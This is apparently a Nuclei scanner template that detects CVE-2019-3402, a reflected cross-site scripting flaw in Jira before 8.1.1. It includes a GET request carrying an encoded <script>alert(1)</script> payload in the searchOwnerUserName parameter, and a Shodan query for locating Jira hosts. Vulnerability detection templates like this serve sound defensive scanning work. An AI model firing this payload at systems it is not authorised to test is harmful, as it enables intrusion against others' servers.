id: CVE-2019-3402

info:
  name: Jira < 8.1.1 - Cross-Site Scripting
  author: pdteam
  severity: medium
  description: |
    Jira before 8.1.1 contains a cross-site scripting vulnerability via ConfigurePortalPages.jspa resource in the searchOwnerUserName parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential session hijacking, data theft, or defacement.
  remediation: |
    Upgrade Jira to version 8.1.1 or later to mitigate this vulnerability.
  reference:
    - https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
    - https://jira.atlassian.com/browse/JRASERVER-69243
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3402
    - https://github.com/ARPSyndicate/cvemon
    - https://github.com/Faizee-Asad/JIRA-Vulnerabilities
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2019-3402
    cwe-id: CWE-79
    epss-score: 0.00254
    epss-percentile: 0.63243
    cpe: cpe:2.3:a:atlassian:jira:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: atlassian
    product: jira
    shodan-query: http.component:"Atlassian Jira"
  tags: cve,cve2019,atlassian,jira,xss

http:
  - method: GET
    path:
      - "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "'<script>alert(1)</script>' does not exist"

      - type: word
        part: header
        words:
          - text/html

      - type: status
        status:
          - 200
# digest: 490a00463044022037b1f29a4464ebfb8497117d2e4e99844a5931b4471944ee4d4f10fcd5676b4102202aeb28dd77a0966e8be7d93783bcbcd55239d26041a0359a744b9d0c91c18da9:922c64590222798bb761d5b6d8e72950